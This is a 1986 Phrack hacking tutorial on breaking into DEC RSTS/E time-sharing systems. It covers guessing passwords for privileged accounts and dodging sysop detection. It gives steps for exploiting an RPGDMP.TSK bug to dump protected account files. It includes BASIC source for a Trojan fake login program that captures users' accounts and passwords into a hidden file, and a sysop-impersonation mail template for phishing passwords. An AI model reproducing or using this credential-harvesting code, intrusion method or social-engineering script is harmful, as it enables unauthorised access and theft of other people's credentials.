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Phrack Inc.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One, Issue 7, Phile #5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PROGRAMMING RSTS/E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File1: Passwords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by:  The Seker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TOK!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Written  (c)  May 22, 1986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'TRIBUNAL COMMUNICATIONS'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first in a series of ongoing files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 operating system.  All the files are based on version 8.0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ully compatible with the previous releases.  If the need aris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ure to note differences between V8.x and V9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goes to High Evolutionary for urging me to write these file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talker for sharing info; and to all other RSTS hack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in som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STS/E (Resource System Time Sharing /Environment)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for the PDP/11 series of minicomputers created by DEC. (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rporation)  It was developed with ease of use for the us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) in mind.  Because of this, there have been a lot of overlook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ystem with quite weak security.  In later vers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.x series password security has been greatly improved and is more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has plenty of bugs for us to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.. locate a valid number and connect.  Hit c/r (carriage return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 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hould identify itself displaying to you who owns it,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running under, the date, and the time.  Then it will promp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and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are in a PPN (Project Program Number) format. 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 each between 0 and 254 separated by a comma or a slash.  (eg. 3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7/248)  Privileged accounts which you should hopefully be striv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1.  So start hacking 1,x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are 1-6 characters long.  They are only alphanumeric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all that other shit being included.  On V9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may be up to 8 characters if the operator has chang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But this rarely ever happens as most ops are too l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ass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ose have been rumored to be defaults.  But actually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default (if there is one!) passwor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ccounts that have a passwor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ccessible b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try names, cars, objects, the name of the compan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tions), etc.  Cause most people generally pick pass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relation to their private life.. Take a little time and g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ucceeded in hacking out a valid password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or not, I suggest you find out who is logged onto the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ll you everyone logged on, what they are doing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b number, whether they are attached or detached, and a hell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ap.  What you are looking for is someone else logged in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you are.  If you find another user in the same account you hacked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call back later.  This will prolong the life of your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rise in suspicion by the sysops.  Remember, every system keep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 do, and if two people are logged in under the same accou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ysops will delete or change the password to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thing checks out okay, you're free to do as you please. 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your allotted spac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ee all the files on the syste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(*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[ ] may be used in place of ( ) when dealing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cts as a wildcard on the RSTS system and can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s when searching for specific files.  Speaking of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to run a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= the file you wish to run, and filetype =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!  Try what you will.  If you ever need help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s contained within help.  They are very detail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can help you with what ever it is you need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thing, a few useful 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C   Breaks out of whatever you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R   Repeats last lin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If ^C doesn't work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Use to stop the flow of text without aborting the function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T   Tells status and runtime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U   Deletes line presently being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Delete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S   Transmiss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Q   Trans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n't able to hack out a privileged account don't panic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 few other ways for you to attain sysop status.  These metho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work, but they are worth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SYSTEM LOG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ny RSTS/E systems before V9.0 there is one account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system log; everything you and everyone else does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many times to be 1,101, 1,2, or 0,1 but you may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nd to make sure.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(*,*)OPS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nothing appears from tha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(*,*)SYSLOG.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(*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a file similar in name to that and mark down the acco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.  Now that you know which account the system log resides in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gn back on using the account in which the file was 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r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common passwords to that account.  If none of these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uck unless you can think of some other password that may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SYSTEM BUGS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rating systems as complex as RSTS/E are create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be a few bugs in the operation or security.  (Sometimes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f these are intentional or not.)  These can often be taken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 know of is RPGDMP.TSK.  To use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(1,2)RP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sk for a filename, and an output device.  Give it any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(I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dum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evice. (db1:, screen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for this goes to The Marauder of LOD for finding, expo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is bug with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y other bugs similar to this, I would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touch with and letting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've hopefully gotten yourself priv's we can get o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Getting many passwords is a safety procedure, kind of lik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a program.  There are a number of ways to ge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the easiest is by using privileges, but we will discuss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ile.  The methods I am going to explain are the decoy and a trick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which I call the mai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DECOY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oy, commonly called a Trojan Horse, (which is someth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 is a program which emulates login.bac.  When the unsuspec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his account and password you have your program store it into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rieve later.  Here is a short program I've written that will p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NEW and it will prompt for a filename.  Enter something not t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! RSTSE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! Written by The Seker (c) 1986 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print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&amp;"RSTS V8.0-07 TOK Communications Ltd.  Job 7  &lt;Dial-up&gt; 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;date$(0);"  ";time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&amp;"User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open "KB:" for input as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on error go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input #1,proj%,pr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z$=sys(chr$(3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&amp;"Password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on error go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input #1,pa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print:z$=sys(chr$(2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open "SYSLIB.BAC" for output as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print #2,pro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print #2,pr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 print #2,pa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clo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print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 off$=sys(chr$(14%)+"bye/f"+chr$(1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if erl=70 then goto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 if erl=110 then goto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 &amp;"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 the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else resum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&amp;"Invalid entry - try again":try=try+1:if try=5 then goto 200 els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 I said emulates login.bac, then logs the person off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ries.  Save this program.  Then run it.  When it starts, just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The next person to call within 15 minutes will get your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working on an older system like V7.0 change line 40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amp;"#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will not work without modifications on releases after V8.7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nd updated version of this program will be released as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ime you login and you want to recover th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SYSLIB.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print out the account and password.  If you set th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lan on hanging up within a few days you'll have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vali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MAIL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ai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$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method is probably used by many hackers and since I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thought I'd tell you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program the utility will tell you exactly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ssuming you know a little about it anyway we will get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object is to send mail to another user and try and convince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sysop and are writing him/her to validate their passwor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with a priv'd user!  It would result in instant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basically what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.  We are contacting each of the users and validating their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ur files up to date. If you would cooperate and leave me a respon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your full name, account number, and password we would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tem'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the idea is to con a user into believing you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s.  I would say this method works approximately 70% of th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s since users often times don't associate with sysops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if you try this though, as John Doe wouldn't fool anyone. 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)  Also the 4,11 is the account you'd like them to leave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ry a few variations of this if you like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're hacking has a cha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$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talk live time to them.  Or if you somehow (like trashing)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all the users and their phone numbers, you can call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llsh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document is intended for informational purposes only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no way responsible for how it is used.  Sysops are free to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will as long as no information within is alter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go to The Seker and members of The Tribunal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&gt;   (c) 1986 TRIBUNAL OF KNOWLEDGE!  &lt;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/^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/   @ |  /_-_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_| @     @|- - -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mi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